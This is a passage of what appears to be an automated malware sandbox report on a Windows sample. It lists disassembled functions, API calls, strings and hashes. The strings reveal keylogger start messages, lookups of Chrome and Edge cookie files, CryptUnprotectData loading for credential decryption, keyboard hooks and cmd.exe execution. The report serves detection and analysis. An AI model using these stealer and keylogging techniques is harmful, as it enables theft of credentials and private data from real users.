                                                                                          • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                          Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 00444106
                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                          • _free.LIBCMT ref: 00444118
                                                                                          • _free.LIBCMT ref: 0044412B
                                                                                          • _free.LIBCMT ref: 0044413C
                                                                                          • _free.LIBCMT ref: 0044414D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                          • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                          • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                          Function 00413A90 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Enum$InfoQueryValue
                                                                                          • String ID: [regsplt]
                                                                                          • API String ID: 3554306468-4262303796
                                                                                          • Opcode ID: 9697bb9c8a57706a51b28894dccdef54b3feb513602de5161671525287b676f0
                                                                                          • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                                                          • Opcode Fuzzy Hash: 9697bb9c8a57706a51b28894dccdef54b3feb513602de5161671525287b676f0
                                                                                          • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                                                          Function 004434D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe,00000104), ref: 00443515
                                                                                          • _free.LIBCMT ref: 004435E0
                                                                                          • _free.LIBCMT ref: 004435EA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$FileModuleName
                                                                                          • String ID: C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe
                                                                                          • API String ID: 2506810119-2157930343
                                                                                          • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                          • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                          • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                          • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                          Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                                                          Strings
                                                                                          • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                          • API String ID: 1174141254-1980882731
                                                                                          • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                          • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                          • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                          • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                          Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                                                          Strings
                                                                                          • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExistsFilePath
                                                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                          • API String ID: 1174141254-1980882731
                                                                                          • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                          • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                          • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                          • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                          Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040A249
                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040A255
                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread$LocalTimewsprintf
                                                                                          • String ID: Offline Keylogger Started
                                                                                          • API String ID: 465354869-4114347211
                                                                                          • Opcode ID: 64dafc61654423eae3a0fbe5438306b162becb50c4c83e3e1bc02331eec3325d
                                                                                          • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                          • Opcode Fuzzy Hash: 64dafc61654423eae3a0fbe5438306b162becb50c4c83e3e1bc02331eec3325d
                                                                                          • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                          Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040B1AD
                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateThread$LocalTime$wsprintf
                                                                                          • String ID: Online Keylogger Started
                                                                                          • API String ID: 112202259-1258561607
                                                                                          • Opcode ID: 96596c8b347fbc26a7a26b2b5d6211d38eccf114500c3d7a40bfe83d515ab29d
                                                                                          • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                          • Opcode Fuzzy Hash: 96596c8b347fbc26a7a26b2b5d6211d38eccf114500c3d7a40bfe83d515ab29d
                                                                                          • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                          Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: CryptUnprotectData$crypt32
                                                                                          • API String ID: 2574300362-2380590389
                                                                                          • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                          • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                          • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                          • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                          Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                          • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                          • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEventHandleObjectSingleWait
                                                                                          • String ID: Connection Timeout
                                                                                          • API String ID: 2055531096-499159329
                                                                                          • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                          • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                          • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                          • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                          Function 0040E800 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw
                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                          • API String ID: 2005118841-1866435925
                                                                                          • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                          • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                                                                          • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                                                                          • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                                                                          Function 0041384F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041385A
                                                                                          • RegSetValueExW.ADVAPI32(004752D8,?,00000000,00000001,00000000,00000000,004752F0,?,0040F85E,pth_unenc,004752D8), ref: 00413888
                                                                                          • RegCloseKey.ADVAPI32(004752D8,?,0040F85E,pth_unenc,004752D8), ref: 00413893
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateValue
                                                                                          • String ID: pth_unenc
                                                                                          • API String ID: 1818849710-4028850238
                                                                                          • Opcode ID: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                          • Instruction ID: 9133f253890910ff78e8f434c24b82038cc7026402723a24ca4ec17c3e6d8cb5
                                                                                          • Opcode Fuzzy Hash: 5c236e770f027b7b6dfc699725bd7ba66defa52264e3e321846078cfa9e8a7ba
                                                                                          • Instruction Fuzzy Hash: 15F0C271440218FBCF00AFA1EC45FEE376CEF00756F10452AF905A61A1E7759E04DA94
                                                                                          Function 0040DFE1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                                                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                                                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                                                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                          • String ID: bad locale name
                                                                                          • API String ID: 3628047217-1405518554
                                                                                          • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                          • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                                                                          • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                                                                          • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                                                                          Function 00416C68 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                                                                          • ShowWindow.USER32(00000009), ref: 00416C9C
                                                                                          • SetForegroundWindow.USER32 ref: 00416CA8
                                                                                            • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                                                                            • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                            • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                            • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                          • String ID: !D@
                                                                                          • API String ID: 186401046-604454484
                                                                                          • Opcode ID: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                                                          • Instruction ID: 9f5213224becab59645eda34593d96b16d6ada18beeab21aaf628210512d7754
                                                                                          • Opcode Fuzzy Hash: c95d4037f996435fc130d7113ec89fe5e4aa0dd425f9b60b55efc54c96c60bf0
                                                                                          • Instruction Fuzzy Hash: ECF05E70149340EAD720AB62ED45AFA7B69EB54341F01487BF909C20F2DB389C94865E
                                                                                          Function 00416129 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExecuteShell
                                                                                          • String ID: /C $cmd.exe$open
                                                                                          • API String ID: 587946157-3896048727
                                                                                          • Opcode ID: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                          • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                                                                          • Opcode Fuzzy Hash: 6b954565fb865431a8f0571ad86dfb8a094b841cbf93f4f8f4d3cab274959172
                                                                                          • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                                                                          Function 0040B8E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • TerminateThread.KERNEL32(0040A2B8,00000000,004752F0,pth_unenc,0040D0F3,004752D8,004752F0,?,pth_unenc), ref: 0040B8F6
                                                                                          • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                                          • TerminateThread.KERNEL32(0040A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: TerminateThread$HookUnhookWindows
                                                                                          • String ID: pth_unenc
                                                                                          • API String ID: 3123878439-4028850238
                                                                                          • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                          • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                                                                          • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                                                                          • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                                                                          Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc
                                                                                          • String ID: GetCursorInfo$User32.dll
                                                                                          • API String ID: 1646373207-2714051624
                                                                                          • Opcode ID: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                          • Instruction ID: 8b26e8b19aea132afe7ec2793fcae50f4a2deac5c44528798ee909e27cd98dc2
                                                                                          • Opcode Fuzzy Hash: d896883a00b7c9d91a41f0e937368129b1e8cf7bb1ae53218dcc7360cef0261f
                                                                                          • Instruction Fuzzy Hash: 6BB092B4981740FB8F102BB0AE4EA193A25B614703B1008B6F046961A2EBB888009A2E
                                                                                          Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: GetLastInputInfo$User32.dll
                                                                                          • API String ID: 2574300362-1519888992
                                                                                          • Opcode ID: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                          • Instruction ID: d02e03e3b89f99dad65f23c179d95e13f318a7fd709defe56253aab8848571e2
                                                                                          • Opcode Fuzzy Hash: 97ca63f656fbe05ba3a699769711b358361c41ed64750357eec187df6322536e
                                                                                          • Instruction Fuzzy Hash: EFB092B8580300FBCB102FA0AD4E91E3A68AA18703B1008A7F441C21A1EBB888009F5F
                                                                                          Function 0044A084 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: __alldvrm$_strrchr
                                                                                          • String ID:
                                                                                          • API String ID: 1036877536-0
                                                                                          • Opcode ID: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                          • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                                                                          • Opcode Fuzzy Hash: 70c324bd787235ec34b4410bef6e6c487e79153caf11c4279a27308c3ab035ac
                                                                                          • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                                                                          Function 00442851 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
